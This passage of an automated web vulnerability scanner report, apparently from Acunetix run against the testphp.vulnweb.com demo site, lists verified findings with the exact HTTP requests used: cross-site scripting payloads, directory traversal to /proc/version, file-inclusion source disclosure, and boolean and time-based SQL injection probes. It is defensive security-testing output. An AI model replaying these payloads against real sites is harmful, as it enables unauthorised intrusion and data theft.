URL encoded POST input name was set to test'"()&%<acx><ScRiPt >Y6Zb(9407)</ScRiPt>
Request headers
POST /guestbook.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 84
Host: testphp.vulnweb.com
Connection: Keep-alive
name=test'"()%26%25<acx><ScRiPt%20>Y6Zb(9407)</ScRiPt>&submit=add%20message&text=555
/guestbook.php
Verified vulnerability
Details
URL encoded POST input text was set to 555'"()&%<acx><ScRiPt >Y6Zb(9283)</ScRiPt>
31
Request headers
POST /guestbook.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 84
Host: testphp.vulnweb.com
Connection: Keep-alive
name=test&submit=add%20message&text=555'"()%26%25<acx><ScRiPt%20>Y6Zb(9283)</ScRiPt>
/hpp/
Verified vulnerability
Details
URL encoded GET input pp was set to 12'"()&%<acx><ScRiPt >jZhN(9893)</ScRiPt>
Request headers
GET /hpp/?pp=12'"()%26%25<acx><ScRiPt%20>jZhN(9893)</ScRiPt> HTTP/1.1
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/hpp/params.php
Verified vulnerability
Details
URL encoded GET input p was set to 1'"()&%<acx><ScRiPt >3dES(9569)</ScRiPt>
Request headers
32
GET /hpp/params.php?p=1'"()%26%25<acx><ScRiPt%20>3dES(9569)</ScRiPt> HTTP/1.1
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/hpp/params.php
Verified vulnerability
Details
URL encoded GET input pp was set to 12'"()&%<acx><ScRiPt >l4SI(9722)</ScRiPt>
Request headers
GET /hpp/params.php?p=valid&pp=12'"()%26%25<acx><ScRiPt%20>l4SI(9722)</ScRiPt> HTTP/1.1
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/listproducts.php
Verified vulnerability
Details
URL encoded GET input artist was set to 1'"()&%<acx><ScRiPt >KM0B(9371)</ScRiPt>
Request headers
33
GET /listproducts.php?artist=1'"()%26%25<acx><ScRiPt%20>KM0B(9371)</ScRiPt> HTTP/1.1
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/listproducts.php
Verified vulnerability
Details
URL encoded GET input cat was set to 1'"()&%<acx><ScRiPt >h2AQ(9315)</ScRiPt>
Request headers
GET /listproducts.php?cat=1'"()%26%25<acx><ScRiPt%20>h2AQ(9315)</ScRiPt> HTTP/1.1
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/search.php
Verified vulnerability
Details
URL encoded POST input searchFor was set to the'"()&%<acx><ScRiPt >33Yw(9328)</ScRiPt>
Request headers
34
POST /search.php?test=query HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 70
Host: testphp.vulnweb.com
Connection: Keep-alive
goButton=go&searchFor=the'"()%26%25<acx><ScRiPt%20>33Yw(9328)</ScRiPt>
/secured/newuser.php
Verified vulnerability
Details
URL encoded POST input uaddress was set to 3137 Laguna Street'"()&%<acx><ScRiPt >cVea(9682)</ScRiPt>
Request headers
POST /secured/newuser.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 236
Host: testphp.vulnweb.com
Connection: Keep-alive
signup=signup&uaddress=3137%20Laguna%20Street'"()%26%25<acx><ScRiPt%20>cVea(9682)
</ScRiPt>&ucc=4111111111111111&uemail=sample%40email.tst&upass=g00dPa%24%24w0rD&upass2=g0
0dPa%24%24w0rD&uphone=555-666-0606&urname=ghovjnjv&uuname=ghovjnjv
/secured/newuser.php
Verified vulnerability
Details
35
URL encoded POST input ucc was set to 4111111111111111'"()&%<acx><ScRiPt >cVea(9182)</ScRiPt>
Request headers
POST /secured/newuser.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 236
Host: testphp.vulnweb.com
Connection: Keep-alive
signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111'"()%26%25<acx>
<ScRiPt%20>cVea(9182)
</ScRiPt>&uemail=sample%40email.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone
=555-666-0606&urname=ghovjnjv&uuname=ghovjnjv
/secured/newuser.php
Verified vulnerability
Details
URL encoded POST input uemail was set to sample@email.tst'"()&%<acx><ScRiPt >cVea(9345)</ScRiPt>
Request headers
36
POST /secured/newuser.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 236
Host: testphp.vulnweb.com
Connection: Keep-alive
signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email.
tst'"()%26%25<acx><ScRiPt%20>cVea(9345)
</ScRiPt>&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-
0606&urname=ghovjnjv&uuname=ghovjnjv
/secured/newuser.php
Verified vulnerability
Details
URL encoded POST input uphone was set to 555-666-0606'"()&%<acx><ScRiPt >cVea(9547)</ScRiPt>
Request headers
POST /secured/newuser.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 236
Host: testphp.vulnweb.com
Connection: Keep-alive
signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email.
tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606'"()%26%25<acx>
<ScRiPt%20>cVea(9547)</ScRiPt>&urname=ghovjnjv&uuname=ghovjnjv
/secured/newuser.php
37
Verified vulnerability
Details
URL encoded POST input urname was set to ghovjnjv'"()&%<acx><ScRiPt >cVea(9871)</ScRiPt>
Request headers
POST /secured/newuser.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 236
Host: testphp.vulnweb.com
Connection: Keep-alive
signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email.
tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=ghovjnjv'"
()%26%25<acx><ScRiPt%20>cVea(9871)</ScRiPt>&uuname=ghovjnjv
/secured/newuser.php
Verified vulnerability
Details
URL encoded POST input uuname was set to ghovjnjv'"()&%<acx><ScRiPt >cVea(9277)</ScRiPt>
Request headers
38
POST /secured/newuser.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 236
Host: testphp.vulnweb.com
Connection: Keep-alive
signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email.
tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-
0606&urname=ghovjnjv&uuname=ghovjnjv'"()%26%25<acx><ScRiPt%20>cVea(9277)</ScRiPt>
/userinfo.php
Verified vulnerability
Details
URL encoded POST input uaddress was set to <div id="content"> <div class="story"> <h3>If you are already
registered please enter your login information below:</h3><br> <form name="loginform" method="post"
action="userinfo.php"> <table cellpadding="4" cellspacing="1"> <tr><td>Username : </td><td><input
name="uname" type="text" size="20" style="width:120px;"></td></tr> <tr><td>Password : </td><td><input
name="pass" type="password" size="20" style="width:120px;"></td></tr> <tr><td colspan="2" align="right">
<input type="submit" value="login" style="width:75px;"></td></tr> </table> </form> </div>'"()&%<acx><ScRiPt
>3o1l(9394)</ScRiPt>
Request headers
39
POST /userinfo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 852
Host: testphp.vulnweb.com
Connection: Keep-alive
uaddress=
<div%20id="content">%0D%0A%09<div%20class="story">%0D%0A%09<h3>If%20you%20are%20already%2
0registered%20please%20enter%20your%20login%20information%20below:</h3>
<br>%0D%0A%09<form%20name="loginform"%20method="post"%20action="userinfo.php">%0D%0A%09<t
able%20cellpadding="4"%20cellspacing="1">%0D%0A%09%09<tr><td>Username%20:%20</td><td>
<input%20name="uname"%20type="text"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td>Password%20:%20</td><td>
<input%20name="pass"%20type="password"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td%20colspan="2"%20align="right">
<input%20type="submit"%20value="login"%20style="width:75px;"></td>
</tr>%0D%0A%09</table>%0D%0A%09</form>%0D%0A%20%20%09</div>'"()%26%25<acx>
<ScRiPt%20>3o1l(9394)
</ScRiPt>&ucc=777&uemail=matheusdaocu%40gmail.com&update=update&uphone=%2B555%20666666666
/userinfo.php
Verified vulnerability
Details
URL encoded POST input ucc was set to 777"onmouseover=3o1l(9849)"
40
POST /userinfo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 831
Host: testphp.vulnweb.com
Connection: Keep-alive
uaddress=
<div%20id="content">%0D%0A%09<div%20class="story">%0D%0A%09<h3>If%20you%20are%20already%2
0registered%20please%20enter%20your%20login%20information%20below:</h3>
<br>%0D%0A%09<form%20name="loginform"%20method="post"%20action="userinfo.php">%0D%0A%09<t
able%20cellpadding="4"%20cellspacing="1">%0D%0A%09%09<tr><td>Username%20:%20</td><td>
<input%20name="uname"%20type="text"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td>Password%20:%20</td><td>
<input%20name="pass"%20type="password"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td%20colspan="2"%20align="right">
<input%20type="submit"%20value="login"%20style="width:75px;"></td>
</tr>%0D%0A%09</table>%0D%0A%09</form>%0D%0A%20%20%09</div>&ucc=777"onmouseover=3o1l(9849
)"&uemail=matheusdaocu%40gmail.com&update=update&uphone=%2B555%20666666666
/userinfo.php
Verified vulnerability
Details
URL encoded POST input uemail was set to matheusdaocu@gmail.com'"()&%<acx><ScRiPt >3o1l(9934)</ScRiPt>
Request headers
41
POST /userinfo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 852
Host: testphp.vulnweb.com
Connection: Keep-alive
uaddress=
<div%20id="content">%0D%0A%09<div%20class="story">%0D%0A%09<h3>If%20you%20are%20already%2
0registered%20please%20enter%20your%20login%20information%20below:</h3>
<br>%0D%0A%09<form%20name="loginform"%20method="post"%20action="userinfo.php">%0D%0A%09<t
able%20cellpadding="4"%20cellspacing="1">%0D%0A%09%09<tr><td>Username%20:%20</td><td>
<input%20name="uname"%20type="text"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td>Password%20:%20</td><td>
<input%20name="pass"%20type="password"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td%20colspan="2"%20align="right">
<input%20type="submit"%20value="login"%20style="width:75px;"></td>
</tr>%0D%0A%09</table>%0D%0A%09</form>%0D%0A%20%20%09</div>&ucc=777&uemail=matheusdaocu%4
0gmail.com'"()%26%25<acx><ScRiPt%20>3o1l(9934)
</ScRiPt>&update=update&uphone=%2B555%20666666666
/userinfo.php
Verified vulnerability
Details
URL encoded POST input uphone was set to +555 666666666'"()&%<acx><ScRiPt >3o1l(9784)</ScRiPt>
Request headers
42
POST /userinfo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 852
Host: testphp.vulnweb.com
Connection: Keep-alive
uaddress=
<div%20id="content">%0D%0A%09<div%20class="story">%0D%0A%09<h3>If%20you%20are%20already%2
0registered%20please%20enter%20your%20login%20information%20below:</h3>
<br>%0D%0A%09<form%20name="loginform"%20method="post"%20action="userinfo.php">%0D%0A%09<t
able%20cellpadding="4"%20cellspacing="1">%0D%0A%09%09<tr><td>Username%20:%20</td><td>
<input%20name="uname"%20type="text"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td>Password%20:%20</td><td>
<input%20name="pass"%20type="password"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td%20colspan="2"%20align="right">
<input%20type="submit"%20value="login"%20style="width:75px;"></td>
</tr>%0D%0A%09</table>%0D%0A%09</form>%0D%0A%20%20%09</div>&ucc=777&uemail=matheusdaocu%4
0gmail.com&update=update&uphone=%2B555%20666666666'"()%26%25<acx><ScRiPt%20>3o1l(9784)
</ScRiPt>
/userinfo.php
Verified vulnerability
Details
URL encoded POST input urname was set to ghovjnjv<ScRiPt >3GFT(9826)</ScRiPt>
43
POST /userinfo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 853
Host: testphp.vulnweb.com
Connection: Keep-alive
uaddress=
<div%20id="content">%0D%0A%09<div%20class="story">%0D%0A%09<h3>If%20you%20are%20already%2
0registered%20please%20enter%20your%20login%20information%20below:</h3>
<br>%0D%0A%09<form%20name="loginform"%20method="post"%20action="userinfo.php">%0D%0A%09<t
able%20cellpadding="4"%20cellspacing="1">%0D%0A%09%09<tr><td>Username%20:%20</td><td>
<input%20name="uname"%20type="text"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td>Password%20:%20</td><td>
<input%20name="pass"%20type="password"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td%20colspan="2"%20align="right">
<input%20type="submit"%20value="login"%20style="width:75px;"></td>
</tr>%0D%0A%09</table>%0D%0A%09</form>%0D%0A%20%20%09</div>&ucc=777&uemail=matheusdaocu%4
0gmail.com&update=update&uphone=%2B555%20666666666&urname=ghovjnjv<ScRiPt%20>3GFT(9826)
</ScRiPt>
Directory traversal
Severity High
Reported by module /Scripts/PerScheme/Directory_Traversal.script
Description
Directory Traversal is a vulnerability which allows attackers to access restricted directories and read files outside of the web
server's root directory.
Impact
By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access files in other directories.
As a result, attackers might view restricted files or execute commands, leading to a full compromise of the Web server.
Recommendation
References
44
Acunetix Directory Traversal Attacks (https://www.acunetix.com/websitesecurity/directory-traversal/)
Affected items
/showimage.php
Verified vulnerability
Details
URL encoded GET input file was set to ../../../../../../../../../../../../../../../proc/version
Proof of Exploit
File - /proc/version
Request headers
GET /showimage.php?
file=../../../../../../../../../../../../../../../proc/version&size=160 HTTP/1.1
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
File inclusion
Severity High
Reported by module /Scripts/PerScheme/Script_Source_Code_Disclosure.script
Description
It seems that this script includes a file which name is determined using user-supplied data. This data is not properly
validated before being passed to the include function.
Impact
It is possible for a remote attacker to include a file from local or remote resources and/or execute arbitrary script code with
the privileges of the web-server.
Recommendation
45
Edit the source code to ensure that input is properly validated. Where is possible, it is recommended to make a list of
accepted filenames and restrict the input to that list.
For PHP, the option allow_url_fopen would normally allow a programmer to open, include or otherwise use a remote file
using a URL rather than a local file path. It is recommended to disable this option from php.ini.
References
Affected items
/showimage.php
Details
URL encoded GET input file was set to showimage.php
Pattern found:
<?php
header("Content-Type: image/jpeg");
$name = $_GET["file"];
header("Content-Type: image/jpeg");
fpassthru($fp);
exit;
header("Content-Type: image/jpeg");
$name = $_GET["file"];
$fp ...
Request headers
46
GET /showimage.php?file=showimage.php&size=160 HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity High
Reported by module /Scripts/PerFolder/Dreamweaver_Scripts.script
Description
Macromedia Dreamweaver has created a directory (_mmServerScripts or _mmDBScripts) that contains scripts for testing
database connectivity. One of these scripts (mmhttpdb.php or mmhttpdb.asp) can be accessed without user ID or
password and contains numerous operations, such as listing Datasource Names or executing arbitrary SQL queries.
Impact
Recommendation
References
Affected items
Web Server
Verified vulnerability
Details
Macromedia Dreamweaver scripts found at : //_mmServerScripts/MMHTTPDB.php
Request headers
47
GET //_mmServerScripts/MMHTTPDB.php HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity High
Reported by module /Scripts/PerServer/Version_Check.script
Description
A heap-based buffer overflow in the SPDY implementation in nginx 1.3.15 before 1.4.7 and 1.5.x before 1.5.12 allows
remote attackers to execute arbitrary code via a crafted request. The problem affects nginx compiled with the
ngx_http_spdy_module module (which is not compiled by default) and without --with-debug configure option, if the "spdy"
option of the "listen" directive is used in a configuration file.
Impact
An attacker can cause a heap memory buffer overflow in a worker process by using a specially crafted request, potentially
resulting in arbitrary code execution
Recommendation
Upgrade nginx to the latest version or apply the patch provided by the vendor.
References
Affected items
Web Server
Details
Version detected: nginx/1.4.1.
Request headers
Severity High
48
Reported by module /httpdata/acusensor.js
Description
The PHP configuration directive allow_url_fopen is enabled. When enabled, this directive allows data retrieval from remote
locations (web site or FTP server). A large number of code injection vulnerabilities reported in PHP-based web applications
are caused by the combination of enabling allow_url_fopen and bad input filtering.
Impact
Recommendation
You can disable allow_url_fopen from either php.ini (for PHP versions newer than 4.3.4) or .htaccess (for PHP versions up
to 4.3.4).
php.ini
allow_url_fopen = 'off'
.htaccess
php_flag allow_url_fopen off
References
Affected items
Web Server
Verified vulnerability
Details
Current setting is : allow_url_fopen = On
Request headers
Severity High
Reported by module /httpdata/text_search.js
Description
It looks like this file contains a database backup/dump. A database backup contains a record of the table structure and/or
the data from a database and is usually in the form of a list of SQL statements. A database backup is most often used for
backing up a database so that its contents can be restored in the event of data loss. This information is highly sensitive and
should never be found on a production system.
Impact
This file may disclose sensitive information. This information can be used to launch further attacks.
49
Recommendation
Sensitive files such as database backups should never be stored in a directory that is accessible to the web server. As a
workaround, you could restrict access to this file.
Affected items
/admin/create.sql
Details
Request headers
GET /admin/create.sql HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
SQL injection
Severity High
Reported by module /Scripts/PerScheme/Sql_Injection.script
Description
SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a
web application's database server.
Impact
An attacker can use SQL injection it to bypass a web application's authentication and authorization mechanisms and
retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database,
affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands,
which may then be used to escalate an attack even further.
Recommendation
Use parameterized queries when dealing with SQL queries that contains user input. Parameterized queries allows the
database to understand which parts of the SQL query should be considered as user input, therefore solving SQL injection.
50
References
Affected items
Web Server
Verified vulnerability
Details
Cookie input login was set to 1ACUSTART'"8oNWeACUEND
Request headers
GET / HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: https://www.google.com/search?hl=en&q=testing
Cookie: login=1ACUSTART'"8oNWeACUEND
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
51
URL encoded GET input id was set to 1 AND 3*2*1=6 AND 360=360
Tests performed:
Original value: 1
Proof of Exploit
acuart
Request headers
GET /AJAX/infoartist.php?id=1%20AND%203*2*1=6%20AND%20360=360 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest;mycookie=3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/AJAX/infocateg.php
Verified vulnerability
Details
52
URL encoded GET input id was set to 1 AND 3*2*1=6 AND 876=876
Tests performed:
Original value: 1
Proof of Exploit
acuart
Request headers
GET /AJAX/infocateg.php?id=1%20AND%203*2*1=6%20AND%20876=876 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest;mycookie=3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/AJAX/infotitle.php
Verified vulnerability
Details
53
URL encoded POST input id was set to 1 AND 3*2*1=6 AND 130=130
Tests performed:
Original value: 1
Proof of Exploit
acuart
Request headers
POST /AJAX/infotitle.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest;mycookie=3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 36
Host: testphp.vulnweb.com
Connection: Keep-alive
id=1%20AND%203*2*1=6%20AND%20130=130
/artists.php
Verified vulnerability
Details
URL encoded GET input artist was set to 1ACUSTART'"wElGoACUEND
54
Request headers
GET /artists.php?artist=1ACUSTART'"wElGoACUEND HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Request headers
55
GET /artists.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: https://www.google.com/search?hl=en&q=testing
Cookie: login=1ACUSTART'"BsdfTACUEND
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Request headers
56
POST /cart.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 40
Host: testphp.vulnweb.com
Connection: Keep-alive
addcart=1ACUSTART'"LfRpBACUEND&price=500
Source file: /hj/var/www//cart.php, line: 81
Additional details
SQL query: SELECT * FROM carts WHERE cart_id='b81fdb9b88459aa0e1cac57075e0458a' AND
item=1ACUSTART'"LfRpBACUEND
Request headers
57
GET /cart.php?del=1ACUSTART'"sbNCzACUEND HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Request headers
58
GET /cart.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: https://www.google.com/search?hl=en&q=testing
Cookie: login=1ACUSTART'"uxXy4ACUEND
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Tests performed:
59
POST /cart.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 50
Host: testphp.vulnweb.com
Connection: Keep-alive
addcart=1&price=if(now()=sysdate()%2Csleep(6)%2C0)
/guestbook.php
Verified vulnerability
Details
Cookie input login was set to 1ACUSTART'"sgruDACUEND
Request headers
GET /guestbook.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: https://www.google.com/search?hl=en&q=testing
Cookie: login=1ACUSTART'"sgruDACUEND
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
60
SQL query: SELECT * FROM users WHERE uname='1ACUSTART'"sgruDACUEND' AND pass=''
Request headers
GET /listproducts.php?artist=1ACUSTART'"PA09UACUEND HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Request headers
61
GET /listproducts.php?cat=1ACUSTART'"4exg5ACUEND HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Request headers
62
GET /listproducts.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: https://www.google.com/search?hl=en&q=testing
Cookie: login=1ACUSTART'"qmuLUACUEND
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Request headers
63
GET /Mod_Rewrite_Shop/BuyProduct-3/?id=1ACUSTART'"ACUEND HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
User-Agent: 1'"2000
referer: 1'"3000
client-ip: 1'"4000
x-forwarded-for: 1'"5000
accept-language: 1'"6000
via: 1'"7000
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Stack trace:
